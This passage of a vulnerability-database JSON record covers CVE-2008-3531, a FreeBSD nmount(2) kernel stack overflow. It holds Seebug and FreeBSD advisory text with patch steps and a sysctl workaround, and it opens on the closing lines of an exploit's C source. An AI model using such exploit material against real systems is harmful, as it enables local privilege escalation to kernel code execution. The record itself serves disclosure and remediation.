}\r\n\r\n printf("[*] unmounting and deleting %s\\n", DIRPATH);\r\n unmount(DIRPATH, 0);\r\n rmdir(DIRPATH);\r\n\r\n return EXIT_SUCCESS;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11781", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:29:14", "description": "BUGTRAQ ID: 31002\r\nCVE ID\uff1aCVE-2008-3531\r\nCNCVE ID\uff1aCNCVE-20083531\r\n\r\nFreeBSD\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nFreeBSD\u5904\u7406mount(2)\u548cnmount(2)\u7cfb\u7edf\u8c03\u7528\u5b58\u5728\u95ee\u9898\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5185\u6838\u8fdb\u7a0b\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\u5404\u79cd\u7528\u6237\u5b9a\u4e49\u7684\u8f93\u5165\u5982\u6302\u63a5\u70b9\uff0c\u8bbe\u5907\uff0c\u6302\u63a5\u9009\u9879\u4f1a\u4f5c\u4e3a\u53c2\u6570\u4f20\u9012\u7ed9nmount(2)\u5230\u5185\u6838\uff0c\u5728\u90e8\u5206\u9519\u8bef\u6761\u4ef6\u4e0b\uff0c\u7528\u6237\u5b9a\u4e49\u7684\u6570\u636e\u4f1a\u6ca1\u6709\u5145\u5206\u8fb9\u754c\u68c0\u67e5\u7684\u60c5\u51b5\u4e0b\u62f7\u8d1d\u5230\u5b58\u50a8\u5728\u5185\u6838\u4e2d\u7684\u5806\u6808\u7f13\u51b2\u533a\u4e2d\u3002\u5982\u679c\u7cfb\u7edf\u914d\u7f6e\u6210\u5141\u8bb8\u975e\u7279\u6743\u7528\u6237\u6302\u63a5\u6587\u4ef6\u7cfb\u7edf\uff0c\u53ef\u5bfc\u81f4\u8fd9\u4e9b\u975e\u7279\u6743\u7528\u6237\u901a\u8fc7\u8bbe\u7f6evfs.usermount sysctl(8)\u53d8\u91cf\u5229\u7528\u8fd9\u4e9b\u7cfb\u7edf\u8c03\u7528\uff0c\u4ee5\u5185\u6838\u8fdb\u7a0b\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nFreeBSD FreeBSD 7.0-STABLE\r\nFreeBSD FreeBSD 7.0-RELEASE\n \u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u4f9b\u5e94\u5546\u63d0\u4f9b\u5982\u4e0b\u8865\u4e01\u53ca\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n1\uff09\u66f4\u65b0\u53d7\u5f71\u54cd\u7cfb\u7edf\u52307-STABLE\uff0c\u6216\u8005\u5230\u66f4\u6b63\u65e5\u671f\u4e4b\u540e\u7684RELENG_7_0,\u5b89\u5168\u7248\u672c\u3002\r\n2\uff09\u4e3a\u5f53\u524d\u7cfb\u7edf\u6253\u8865\u4e01\uff1a\r\n\u5982\u4e0b\u8865\u4e01\u7ecf\u9a8c\u8bc1\u53ef\u5e94\u7528\u4e8eFreeBSD 7.0\u7cfb\u7edf\u3002\r\na)\u4ece\u5982\u4e0b\u4f4d\u7f6e\u4e0b\u8f7d\u76f8\u5173\u8865\u4e01\uff0c\u5e76\u4f7f\u7528PGP\u5de5\u5177\u9a8c\u8bc1\u9644\u5e26\u7684PGP\u7b7e\u540d\uff1a\r\n# fetch <a href=http://security.FreeBSD.org/patches/SA-08:08/nmount.patch target=_blank>http://security.FreeBSD.org/patches/SA-08:08/nmount.patch</a>\r\n# fetch <a href=http://security.FreeBSD.org/patches/SA-08:08/nmount.patch.asc target=_blank>http://security.FreeBSD.org/patches/SA-08:08/nmount.patch.asc</a>\r\nb)\u5e94\u7528\u8865\u4e01\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\nc)\u5982<<a href=http://www.freebsd.org/handbook/kernelconfig.html> target=_blank>http://www.freebsd.org/handbook/kernelconfig.html></a> \u6240\u8ff0\u91cd\u65b0\u7f16\u8bd1\u64cd\u4f5c\u7cfb\u7edf\u5e76\u91cd\u542f\u7cfb\u7edf\u3002", "published": "2008-09-10T00:00:00", "type": "seebug", "title": "FreeBSD 'mount(2)'\u548c'nmount(2)'\u591a\u4e2a\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3531"], "modified": "2008-09-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3982", "id": "SSV:3982", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3531"], "description": "\nProblem Description:\nVarious user defined input such as mount points, devices, and\n\t mount options are prepared and passed as arguments to\n\t nmount(2) into the kernel. Under certain error conditions,\n\t user defined data will be copied into a stack allocated buffer\n\t stored in the kernel without sufficient bounds checking.\nImpact:\nIf the system is configured to allow unprivileged users to\n\t mount file systems, it is possible for a local adversary to\n\t exploit this vulnerability and execute code in the context of\n\t the kernel.\nWorkaround:\nIt is possible to work around this issue by allowing only\n\t privileged users to mount file systems by running the\n\t following sysctl(8) command:\n# sysctl vfs.usermount=0\n", "edition": 4, "modified": "2016-08-09T00:00:00", "published": "2008-09-03T00:00:00", "id": "7DBB7197-7B68-11DD-80BA-000BCDF0A03B", "href": "https://vuxml.freebsd.org/freebsd/7dbb7197-7b68-11dd-80ba-000bcdf0a03b.html", "title": "FreeBSD -- nmount(2) local arbitrary code execution", "type": "freebsd", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}]}